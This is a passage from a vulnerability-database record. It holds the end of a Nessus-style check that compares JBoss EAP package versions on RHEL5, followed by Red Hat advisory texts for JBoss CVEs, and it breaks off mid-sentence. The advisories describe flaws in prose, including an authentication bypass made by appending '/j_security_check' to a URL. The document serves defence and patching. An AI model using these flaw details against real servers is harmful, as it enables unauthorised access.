audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:0192\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL5\", rpm:\"jbossas-client-\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"JBoss EAP\");\n\n if (rpm_check(release:\"RHEL5\", reference:\"aopalliance-1.0-5.2.jdk6.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"apache-cxf-2.2.12-6.1.patch_04.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"bsh2-2.0-0.b4.15.1.patch01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"bsh2-bsf-2.0-0.b4.15.1.patch01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"glassfish-jaxb-2.1.12-12_patch_03.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"google-guice-2.0-3.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate3-3.3.2-1.5.GA_CP05.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate3-annotations-3.4.0-3.3.GA_CP05.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate3-annotations-javadoc-3.4.0-3.3.GA_CP05.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate3-entitymanager-3.4.0-4.4.GA_CP05.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate3-entitymanager-javadoc-3.4.0-4.4.GA_CP05.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate3-javadoc-3.3.2-1.5.GA_CP05.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate3-search-3.1.1-2.4.GA_CP05.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate3-search-javadoc-3.1.1-2.4.GA_CP05.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hornetq-2.2.24-1.EAP.GA.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"hornetq-native-2.2.20-1.EAP.GA.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"hornetq-native-2.2.20-1.EAP.GA.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jacorb-jboss-2.3.2-2.jboss_1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"javassist-3.12.0-6.SP1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-aop2-2.1.6-5.CP06.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-bootstrap-1.0.2-1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-cache-core-3.2.11-1.GA.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-cache-pojo-3.0.1-1.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-cl-2.0.11-1.GA.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-cluster-ha-server-api-1.2.1-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-common-beans-1.0.1-2.1.Final.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-common-core-2.2.21-1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"jboss-eap5-native-5.2.0-6.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"jboss-eap5-native-5.2.0-6.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb-3.0-api-5.0.2-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-cache-1.0.0-4.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-core-1.3.9-0.4.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-ext-api-1.0.0-4.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-ext-api-impl-1.0.0-3.7.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-interceptors-1.0.9-0.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-metadata-1.0.0-3.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-metrics-deployer-1.1.1-0.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-security-1.0.2-0.5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-timeout-0.1.1-0.5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-timeout-3.0-api-0.1.1-0.5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-timeout-spi-0.1.1-0.5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-transactions-1.0.2-1.4.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-jacc-1.1-api-5.0.2-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-jad-1.2-api-5.0.2-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-jaspi-1.0-api-5.0.2-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-javaee-5.0.2-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-javaee-poms-5.0.2-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-jaxrpc-api_1.1_spec-1.0.0-16.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-jca-1.5-api-5.0.2-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-jms-1.1-api-5.0.2-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-jpa-deployers-1.0.0-6.1SP2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-logmanager-1.1.2-6.GA_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-messaging-1.4.8-12.SP9.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-naming-5.0.3-5.1.CP02.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-reflect-2.0.4-2.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-remoting-2.5.4-10.SP4.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-seam2-2.2.6.EAP5-10.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-seam2-docs-2.2.6.EAP5-10.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-seam2-examples-2.2.6.EAP5-10.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-seam2-runtime-2.2.6.EAP5-10.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-security-negotiation-2.1.3-1.GA.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-security-spi-2.0.5-4.SP3_1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-transaction-1.0.1-api-5.0.2-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-vfs2-2.2.1-4.GA.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossas-5.2.0-14.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossas-client-5.2.0-14.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossas-hornetq-5.2.0-5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossas-messaging-5.2.0-14.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossas-tp-licenses-5.2.0-7.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossas-ws-cxf-5.2.0-7.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossas-ws-native-5.2.0-14.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbosssx2-2.0.5-8.SP3_1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossts-4.6.1-12.CP13.8.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossts-javadoc-4.6.1-12.CP13.8.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossweb-2.1.13-2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossweb-el-1.0-api-2.1.13-2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossweb-jsp-2.1-api-2.1.13-2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossweb-lib-2.1.13-2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossweb-servlet-2.5-api-2.1.13-2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossws-3.1.2-13.SP15_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossws-common-1.1.0-9.SP10.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossws-framework-3.1.2-9.SP13.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossws-spi-1.1.2-6.SP8.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jgroups-2.6.22-1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jopr-embedded-1.3.4-19.SP6.9.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jopr-hibernate-plugin-3.0.0-14.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jopr-jboss-as-5-plugin-3.0.0-14.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jopr-jboss-cache-v3-plugin-3.0.0-15.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"mod_cluster-demo-1.0.10-12.2.GA_CP04.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"mod_cluster-jbossas-1.0.10-12.2.GA_CP04.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"mod_cluster-jbossweb2-1.0.10-12.2.GA_CP04.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"mod_cluster-native-1.0.10-10.GA_CP04_patch01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"mod_cluster-native-1.0.10-10.GA_CP04_patch01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"mod_cluster-tomcat6-1.0.10-12.2.GA_CP04.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"netty-3.2.5-6.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"picketlink-federation-2.1.5-3.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"picketlink-quickstarts-2.1.5-1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"picketlink-quickstarts-idp-2.1.5-1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"picketlink-quickstarts-pdp-2.1.5-1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"picketlink-quickstarts-sts-2.1.5-1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"resteasy-1.2.1-18.CP02_patch02.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"resteasy-examples-1.2.1-18.CP02_patch02.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"resteasy-javadoc-1.2.1-18.CP02_patch02.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"resteasy-manual-1.2.1-18.CP02_patch02.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rh-eap-docs-5.2.0-6.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rh-eap-docs-examples-5.2.0-6.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-ant-bundle-common-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-common-parent-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-core-client-api-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-core-comm-api-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-core-dbutils-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-core-domain-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-core-gui-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-core-native-system-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-core-parent-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-core-plugin-api-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-core-plugin-container-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-core-plugindoc-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-core-util-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-filetemplate-bundle-common-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-helpers-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-jboss-as-common-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-jmx-plugin-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-modules-parent-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-parent-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-platform-plugin-3.0.0-14.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-plugin-validator-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-pluginAnnotations-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-pluginGen-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-plugins-parent-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-rtfilter-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"spring2-2.5.6-9.SEC03.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"spring2-agent-2.5.6-9.SEC03.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"spring2-all-2.5.6-9.SEC03.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"spring2-aop-2.5.6-9.SEC03.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"spring2-beans-2.5.6-9.SEC03.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"spring2-context-2.5.6-9.SEC03.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"spring2-core-2.5.6-9.SEC03.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"wss4j-1.5.12-4.1_patch_02.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xerces-j2-2.9.1-10.patch02.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xerces-j2-scripts-2.9.1-10.patch02.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xml-commons-1.3.04-8.2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xml-commons-jaxp-1.1-apis-1.3.04-8.2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xml-commons-jaxp-1.2-apis-1.3.04-8.2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xml-commons-jaxp-1.3-apis-1.3.04-8.2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xml-commons-resolver10-1.3.04-8.2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xml-commons-resolver11-1.3.04-8.2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xml-commons-resolver12-1.3.04-8.2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xml-commons-which10-1.3.04-8.2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xml-commons-which11-1.3.04-8.2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xml-security-1.5.1-2.ep5.el5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"aopalliance / apache-cxf / bsh2 / bsh2-bsf / glassfish-jaxb / etc\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2021-10-21T04:46:43", "description": "Security fixes:\n\nAn attack technique against the W3C XML Encryption Standard when block\nciphers were used in CBC mode could allow a remote attacker to conduct\nchosen-ciphertext attacks, leading to the recovery of the entire plain text\nof a particular cryptogram. (CVE-2011-1096)\n\nJBoss Web Services leaked side-channel data when distributing symmetric\nkeys (for XML encryption), allowing a remote attacker to recover the entire\nplain text form of a symmetric key. (CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL)\nexpressions twice, allowing a remote attacker to execute arbitrary code in\nthe context of the application server, or to obtain sensitive information\nfrom the server. Manual action is required to apply this fix. Refer to the\nSolution section. (CVE-2011-2730)\n\nWhen an application used FORM authentication, along with another component\nthat calls request.setUserPrincipal() before the call to\nFormAuthenticator#authenticate() (such as the Single-Sign-On valve), it was\npossible to bypass the security constraint checks in the FORM authenticator\nby appending \"/j_security_check\" to the end of a URL. (CVE-2012-3546)\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against\nvictims using the JMX Console. (CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential if no\nsecurity context was provided. Depending on the deployed applications, this\ncould possibly allow a remote attacker to hijack the credentials of a\npreviously-authenticated user. (CVE-2012-3370)\n\nConfiguring the JMX Invoker to restrict access to users with specific roles\ndid not actually restrict access, allowing remote attackers with valid JMX\nInvoker credentials to perform JMX operations accessible to roles they are\nnot a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing local\nusers to view them via a process listing. (CVE-2009-5066)\n\nIt was found that NonManagedConnectionFactory would log the username and\npassword in plain text when an exception was thrown. This could lead to the\nexposure of authentication credentials if local users had permissions to\nread the log file. (CVE-2012-0034)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow\nunauthenticated access by default in some profiles. The security\ninterceptor's second layer of authentication prevented direct exploitation\nof this flaw. If the interceptor was misconfigured or inadvertently\ndisabled, this flaw could lead to arbitrary code execution in the context\nof the user running the JBoss server. (CVE-2012-0874)\n\nCallerIdentityLoginModule retained the password from the previous call if a\nnull password was provided. In non-default configurations this could\npossibly lead to a remote attacker hijacking a previously-authenticated\nuser's session. (CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum for\nreporting CVE-2011-1096 and CVE-2011-2487, and Tyler Krpata for reporting\nCVE-2011-4575. CVE-2012-3370 and CVE-2012-3369 were discovered by Carlo de\nWolf of Red Hat; CVE-2012-5478 discovered by Derek Horton of Red Hat; and\nCVE-2012-0874 was discovered by David Jorm of the Red Hat Security Response\nTeam.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2013-01-31T00:00:00", "type": "redhat", "title": "(RHSA-2013:0221) Important: JBoss Enterprise BRMS Platform 5.3.1 update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-5066", "CVE-2011-1096", "CVE-2011-2487", "CVE-2011-2730", "CVE-2011-4575", "CVE-2012-0034", "CVE-2012-0874", "CVE-2012-3369", "CVE-2012-3370", "CVE-2012-3546", "CVE-2012-5478"], "modified": "2017-07-24T20:13:43", "id": "RHSA-2013:0221", "href": "https://access.redhat.com/errata/RHSA-2013:0221", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-21T04:44:46", "description": "Security:\n\nJBoss Web Services leaked side-channel data when distributing symmetric\nkeys (for XML encryption), allowing a remote attacker to recover the entire\nplain text form of a symmetric key. (CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL)\nexpressions twice, allowing a remote attacker to execute arbitrary code in\nthe context of the application server, or to obtain sensitive information\nfrom the server. (CVE-2011-2730)\n\nNote: Manual action is required to apply the fix for CVE-2011-2730. If your\nsystem has deployed applications which use Spring framework, the context\nparameter \"springJspExpressionSupport\" must be set to \"false\" to mitigate\nthis flaw, for example, in the application's web.xml file. This will\nprevent the double-evaluation of EL expressions that led to this flaw.\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against\nvictims using the JMX Console. (CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential if\nno security context was provided. Depending on the deployed applications,\nthis could possibly allow a remote attacker to hijack the credentials of a\npreviously-authenticated user. (CVE-2012-3370)\n\nA denial of service flaw was found in the implementation of associative\narrays (hashes) in JRuby. An attacker able to supply a large number of\ninputs to a JRuby application (such as HTTP POST request parameters sent to\na web application) that are used as keys when inserting data into an array\ncould trigger multiple hash function collisions, making array operations\ntake an excessive amount of CPU time. To mitigate this issue, the Murmur\nhash function has been replaced with the Perl hash function.\n(CVE-2012-5370)\n\nNote: JBoss Enterprise SOA Platform only provides JRuby as a dependency of\nthe scripting_chain quickstart example application. The CVE-2012-5370 flaw\nis not exposed unless the version of JRuby shipped with that quickstart is\nused by a deployed, custom application.\n\nConfiguring the JMX Invoker to restrict access to users with specific\nroles did not actually restrict access, allowing remote attackers with\nvalid JMX Invoker credentials to perform JMX operations accessible to\nroles they are not a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing local\nusers to view them via a process listing. (CVE-2009-5066)\n\nNonManagedConnectionFactory logged the username and password in plain text\nwhen an exception was thrown. This could lead to the exposure of\nauthentication credentials if local users had permissions to read the log\nfile. (CVE-2012-0034)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow\nunauthenticated access by default in some profiles. The security\ninterceptor's second layer of authentication prevented direct exploitation\nof this flaw. If the interceptor was misconfigured or inadvertently\ndisabled, this flaw could lead to arbitrary code execution in the context\nof the user running the JBoss server. (CVE-2012-0874)\n\nCallerIdentityLoginModule retained the password from the previous call if a\nnull password was provided. In non-default configurations this could\npossibly lead to a remote attacker hijacking a previously-authenticated\nuser's session. (CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum\nfor reporting CVE-2011-2487, and Tyler Krpata for reporting CVE-2011-4575.\nThe CVE-2012-3370 and CVE-2012-3369 issues were discovered by Carlo de Wolf\nof Red Hat; CVE-2012-5478 was discovered by Derek Horton of Red Hat; and \nCVE-2012-0874 was discovered by David Jorm of the Red Hat Security Response\nTeam.\n\nWarning: Before applying the update, back up your existing JBoss Enterprise\nSOA Platform installation (including its databases, applications,\nconfiguration files, and so on).\n\nAll users of JBoss Enterprise SOA Platform 5.3.0 as provided from the Red\nHat Customer Portal are advised to upgrade to JBoss Enterprise SOA Platform\n5.3.1.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2013-02-20T00:00:00", "type": "redhat", "title": "(RHSA-2013:0533) Important: JBoss Enterprise SOA Platform 5.3.1 update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-5066", "CVE-2011-2487", "CVE-2011-2730", "CVE-2011-4575", "CVE-2012-0034", "CVE-2012-0874", "CVE-2012-3369", "CVE-2012-3370", "CVE-2012-5370", "CVE-2012-5478", "CVE-2012-5629"], "modified": "2017-07-24T20:13:52", "id": "RHSA-2013:0533", "href": "https://access.redhat.com/errata/RHSA-2013:0533", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-19T20:36:53", "description": "An attack technique against the W3C XML Encryption Standard when block\nciphers were used in CBC mode could allow a remote attacker to conduct\nchosen-ciphertext attacks, leading to the recovery of the entire plain text\nof a particular cryptogram. 